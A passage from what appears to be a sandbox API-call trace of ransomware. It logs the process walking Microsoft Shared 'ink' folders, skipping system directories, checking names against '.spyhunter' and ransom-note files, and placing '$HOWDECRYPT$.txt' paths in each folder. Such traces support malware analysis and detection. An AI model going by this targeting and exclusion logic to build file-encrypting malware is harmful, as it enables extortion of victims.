hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.356] lstrcmpiW (lpString1="tabskb.dll.mui", lpString2="Windows") returned -1 [0086.356] lstrlenW (lpString="Windows") returned 7 [0086.356] lstrcmpiW (lpString1="tabskb.dll.mui", lpString2="$Recycle.bin") returned 1 [0086.356] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.356] lstrcmpiW (lpString1="tabskb.dll.mui", lpString2="System Volume Information") returned 1 [0086.356] lstrlenW (lpString="System Volume Information") returned 25 [0086.356] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tabskb.dll.mui") returned 75 [0086.356] StrStrIW (lpFirst="tabskb.dll.mui", lpSrch=".spyhunter") returned 0x0 [0086.357] lstrcmpW (lpString1="tabskb.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.357] lstrcmpW (lpString1="tabskb.dll.mui", lpString2="_uninstalling_.png") returned 1 [0086.357] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tabskb.dll.mui") returned 75 [0086.357] GetProcessHeap () returned 0x2c0000 [0086.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x384800 [0086.357] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x383fd0, Size=0x818) returned 0x3867e8 [0086.357] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.357] lstrcmpiW (lpString1="TipBand.dll.mui", lpString2="Windows") returned -1 [0086.357] lstrlenW (lpString="Windows") returned 7 [0086.357] lstrcmpiW (lpString1="TipBand.dll.mui", lpString2="$Recycle.bin") returned 1 [0086.357] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.357] lstrcmpiW (lpString1="TipBand.dll.mui", lpString2="System Volume Information") returned 1 [0086.357] lstrlenW (lpString="System Volume Information") returned 25 [0086.357] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui") returned 76 [0086.357] StrStrIW (lpFirst="TipBand.dll.mui", lpSrch=".spyhunter") returned 0x0 [0086.357] lstrcmpW (lpString1="TipBand.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.357] lstrcmpW (lpString1="TipBand.dll.mui", lpString2="_uninstalling_.png") returned 1 [0086.357] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui") returned 76 [0086.357] GetProcessHeap () returned 0x2c0000 [0086.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x372048 [0086.357] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x820) returned 0x3867e8 [0086.357] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.357] lstrcmpiW (lpString1="TipRes.dll.mui", lpString2="Windows") returned -1 [0086.357] lstrlenW (lpString="Windows") returned 7 [0086.357] lstrcmpiW (lpString1="TipRes.dll.mui", lpString2="$Recycle.bin") returned 1 [0086.358] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.358] lstrcmpiW (lpString1="TipRes.dll.mui", lpString2="System Volume Information") returned 1 [0086.358] lstrlenW (lpString="System Volume Information") returned 25 [0086.358] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui") returned 75 [0086.358] StrStrIW (lpFirst="TipRes.dll.mui", lpSrch=".spyhunter") returned 0x0 [0086.358] lstrcmpW (lpString1="TipRes.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.358] lstrcmpW (lpString1="TipRes.dll.mui", lpString2="_uninstalling_.png") returned 1 [0086.358] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui") returned 75 [0086.358] GetProcessHeap () returned 0x2c0000 [0086.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x3848e0 [0086.358] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x828) returned 0x3867e8 [0086.358] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.358] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0086.358] lstrlenW (lpString="Windows") returned 7 [0086.358] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$Recycle.bin") returned 1 [0086.358] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.358] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="System Volume Information") returned 1 [0086.358] lstrlenW (lpString="System Volume Information") returned 25 [0086.358] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tipresx.dll.mui") returned 76 [0086.358] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".spyhunter") returned 0x0 [0086.358] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.358] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0086.358] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tipresx.dll.mui") returned 76 [0086.358] GetProcessHeap () returned 0x2c0000 [0086.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x372130 [0086.358] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x830) returned 0x3867e8 [0086.359] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.359] lstrcmpiW (lpString1="TipTsf.dll.mui", lpString2="Windows") returned -1 [0086.359] lstrlenW (lpString="Windows") returned 7 [0086.359] lstrcmpiW (lpString1="TipTsf.dll.mui", lpString2="$Recycle.bin") returned 1 [0086.359] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.359] lstrcmpiW (lpString1="TipTsf.dll.mui", lpString2="System Volume Information") returned 1 [0086.359] lstrlenW (lpString="System Volume Information") returned 25 [0086.359] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipTsf.dll.mui") returned 75 [0086.359] StrStrIW (lpFirst="TipTsf.dll.mui", lpSrch=".spyhunter") returned 0x0 [0086.359] lstrcmpW (lpString1="TipTsf.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.359] lstrcmpW (lpString1="TipTsf.dll.mui", lpString2="_uninstalling_.png") returned 1 [0086.359] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipTsf.dll.mui") returned 75 [0086.359] GetProcessHeap () returned 0x2c0000 [0086.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x3849c0 [0086.359] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x838) returned 0x3867e8 [0086.359] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0086.359] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0086.360] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\$HOWDECRYPT$.txt") returned 77 [0086.360] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\$HOWDECRYPT$.txt") returned 77 [0086.360] GetProcessHeap () returned 0x2c0000 [0086.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x372218 [0086.360] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x840) returned 0x3867e8 [0086.360] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.360] lstrcmpiW (lpString1="es-ES", lpString2="Windows") returned -1 [0086.360] lstrlenW (lpString="Windows") returned 7 [0086.360] lstrcmpiW (lpString1="es-ES", lpString2="$Recycle.bin") returned 1 [0086.360] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.360] lstrcmpiW (lpString1="es-ES", lpString2="System Volume Information") returned -1 [0086.361] lstrlenW (lpString="System Volume Information") returned 25 [0086.361] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES") returned 60 [0086.361] lstrcmpW (lpString1="es-ES", lpString2=".") returned 1 [0086.361] lstrcmpW (lpString1="es-ES", lpString2="..") returned 1 [0086.361] GetProcessHeap () returned 0x2c0000 [0086.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0086.361] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\*") returned 62 [0086.361] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0086.361] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.361] lstrlenW (lpString="Windows") returned 7 [0086.361] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.361] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.361] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.361] lstrlenW (lpString="System Volume Information") returned 25 [0086.361] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\.") returned 62 [0086.362] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.362] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.362] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.362] lstrlenW (lpString="Windows") returned 7 [0086.362] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.362] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.362] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.362] lstrlenW (lpString="System Volume Information") returned 25 [0086.362] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\..") returned 63 [0086.362] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.362] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.362] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.362] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0086.362] lstrlenW (lpString="Windows") returned 7 [0086.362] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$Recycle.bin") returned 1 [0086.362] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.362] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="System Volume Information") returned 1 [0086.362] lstrlenW (lpString="System Volume Information") returned 25 [0086.362] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\tipresx.dll.mui") returned 76 [0086.362] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".spyhunter") returned 0x0 [0086.362] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.362] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0086.362] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\tipresx.dll.mui") returned 76 [0086.362] GetProcessHeap () returned 0x2c0000 [0086.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x372300 [0086.362] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x848) returned 0x3867e8 [0086.362] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0086.363] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0086.363] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\$HOWDECRYPT$.txt") returned 77 [0086.363] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\$HOWDECRYPT$.txt") returned 77 [0086.363] GetProcessHeap () returned 0x2c0000 [0086.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x3723e8 [0086.363] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x850) returned 0x3867e8 [0086.363] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.363] lstrcmpiW (lpString1="et-EE", lpString2="Windows") returned -1 [0086.363] lstrlenW (lpString="Windows") returned 7 [0086.363] lstrcmpiW (lpString1="et-EE", lpString2="$Recycle.bin") returned 1 [0086.363] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.363] lstrcmpiW (lpString1="et-EE", lpString2="System Volume Information") returned -1 [0086.363] lstrlenW (lpString="System Volume Information") returned 25 [0086.363] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE") returned 60 [0086.363] lstrcmpW (lpString1="et-EE", lpString2=".") returned 1 [0086.363] lstrcmpW (lpString1="et-EE", lpString2="..") returned 1 [0086.363] GetProcessHeap () returned 0x2c0000 [0086.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0086.363] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\*") returned 62 [0086.363] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0086.475] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.475] lstrlenW (lpString="Windows") returned 7 [0086.475] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.475] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.475] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.475] lstrlenW (lpString="System Volume Information") returned 25 [0086.475] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\.") returned 62 [0086.475] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.475] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.475] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.475] lstrlenW (lpString="Windows") returned 7 [0086.475] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.475] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.475] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.476] lstrlenW (lpString="System Volume Information") returned 25 [0086.476] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\..") returned 63 [0086.476] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.476] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.476] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.476] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0086.476] lstrlenW (lpString="Windows") returned 7 [0086.476] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$Recycle.bin") returned 1 [0086.476] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.476] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="System Volume Information") returned 1 [0086.476] lstrlenW (lpString="System Volume Information") returned 25 [0086.476] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\tipresx.dll.mui") returned 76 [0086.476] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".spyhunter") returned 0x0 [0086.476] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.476] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0086.476] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\tipresx.dll.mui") returned 76 [0086.476] GetProcessHeap () returned 0x2c0000 [0086.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x3724d0 [0086.476] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x858) returned 0x3867e8 [0086.476] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0086.476] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0086.476] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\$HOWDECRYPT$.txt") returned 77 [0086.476] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\$HOWDECRYPT$.txt") returned 77 [0086.476] GetProcessHeap () returned 0x2c0000 [0086.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x3725b8 [0086.476] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x860) returned 0x3867e8 [0086.476] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.476] lstrcmpiW (lpString1="fi-FI", lpString2="Windows") returned -1 [0086.477] lstrlenW (lpString="Windows") returned 7 [0086.477] lstrcmpiW (lpString1="fi-FI", lpString2="$Recycle.bin") returned 1 [0086.477] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.477] lstrcmpiW (lpString1="fi-FI", lpString2="System Volume Information") returned -1 [0086.477] lstrlenW (lpString="System Volume Information") returned 25 [0086.477] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI") returned 60 [0086.477] lstrcmpW (lpString1="fi-FI", lpString2=".") returned 1 [0086.477] lstrcmpW (lpString1="fi-FI", lpString2="..") returned 1 [0086.477] GetProcessHeap () returned 0x2c0000 [0086.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0086.477] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\*") returned 62 [0086.477] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0086.477] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.477] lstrlenW (lpString="Windows") returned 7 [0086.477] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.477] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.477] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.477] lstrlenW (lpString="System Volume Information") returned 25 [0086.477] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\.") returned 62 [0086.477] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.477] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.477] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.477] lstrlenW (lpString="Windows") returned 7 [0086.478] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.478] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.478] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.478] lstrlenW (lpString="System Volume Information") returned 25 [0086.478] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\..") returned 63 [0086.478] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.478] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.478] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.478] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0086.478] lstrlenW (lpString="Windows") returned 7 [0086.478] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$Recycle.bin") returned 1 [0086.478] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.478] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="System Volume Information") returned 1 [0086.478] lstrlenW (lpString="System Volume Information") returned 25 [0086.478] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\tipresx.dll.mui") returned 76 [0086.478] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".spyhunter") returned 0x0 [0086.478] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.478] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0086.478] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\tipresx.dll.mui") returned 76 [0086.478] GetProcessHeap () returned 0x2c0000 [0086.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x3726a0 [0086.478] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x868) returned 0x3867e8 [0086.478] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0086.478] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0086.478] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\$HOWDECRYPT$.txt") returned 77 [0086.478] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\$HOWDECRYPT$.txt") returned 77 [0086.478] GetProcessHeap () returned 0x2c0000 [0086.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x372788 [0086.478] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x870) returned 0x3867e8 [0086.479] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.479] lstrcmpiW (lpString1="FlickAnimation.avi", lpString2="Windows") returned -1 [0086.479] lstrlenW (lpString="Windows") returned 7 [0086.479] lstrcmpiW (lpString1="FlickAnimation.avi", lpString2="$Recycle.bin") returned 1 [0086.479] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.479] lstrcmpiW (lpString1="FlickAnimation.avi", lpString2="System Volume Information") returned -1 [0086.479] lstrlenW (lpString="System Volume Information") returned 25 [0086.479] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 73 [0086.479] StrStrIW (lpFirst="FlickAnimation.avi", lpSrch=".spyhunter") returned 0x0 [0086.479] lstrcmpW (lpString1="FlickAnimation.avi", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.479] lstrcmpW (lpString1="FlickAnimation.avi", lpString2="_uninstalling_.png") returned 1 [0086.479] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 73 [0086.479] GetProcessHeap () returned 0x2c0000 [0086.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd4) returned 0x384aa0 [0086.479] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x878) returned 0x3867e8 [0086.479] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.479] lstrcmpiW (lpString1="FlickLearningWizard.exe", lpString2="Windows") returned -1 [0086.479] lstrlenW (lpString="Windows") returned 7 [0086.479] lstrcmpiW (lpString1="FlickLearningWizard.exe", lpString2="$Recycle.bin") returned 1 [0086.479] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.479] lstrcmpiW (lpString1="FlickLearningWizard.exe", lpString2="System Volume Information") returned -1 [0086.479] lstrlenW (lpString="System Volume Information") returned 25 [0086.479] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickLearningWizard.exe") returned 78 [0086.479] StrStrIW (lpFirst="FlickLearningWizard.exe", lpSrch=".spyhunter") returned 0x0 [0086.479] lstrcmpW (lpString1="FlickLearningWizard.exe", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.479] lstrcmpW (lpString1="FlickLearningWizard.exe", lpString2="_uninstalling_.png") returned 1 [0086.479] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickLearningWizard.exe") returned 78 [0086.479] GetProcessHeap () returned 0x2c0000 [0086.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x372870 [0086.479] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x880) returned 0x3867e8 [0086.479] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.480] lstrcmpiW (lpString1="fr-FR", lpString2="Windows") returned -1 [0086.480] lstrlenW (lpString="Windows") returned 7 [0086.480] lstrcmpiW (lpString1="fr-FR", lpString2="$Recycle.bin") returned 1 [0086.480] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.480] lstrcmpiW (lpString1="fr-FR", lpString2="System Volume Information") returned -1 [0086.480] lstrlenW (lpString="System Volume Information") returned 25 [0086.480] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR") returned 60 [0086.480] lstrcmpW (lpString1="fr-FR", lpString2=".") returned 1 [0086.480] lstrcmpW (lpString1="fr-FR", lpString2="..") returned 1 [0086.480] GetProcessHeap () returned 0x2c0000 [0086.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0086.480] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\*") returned 62 [0086.480] FindFirstFileW (in: 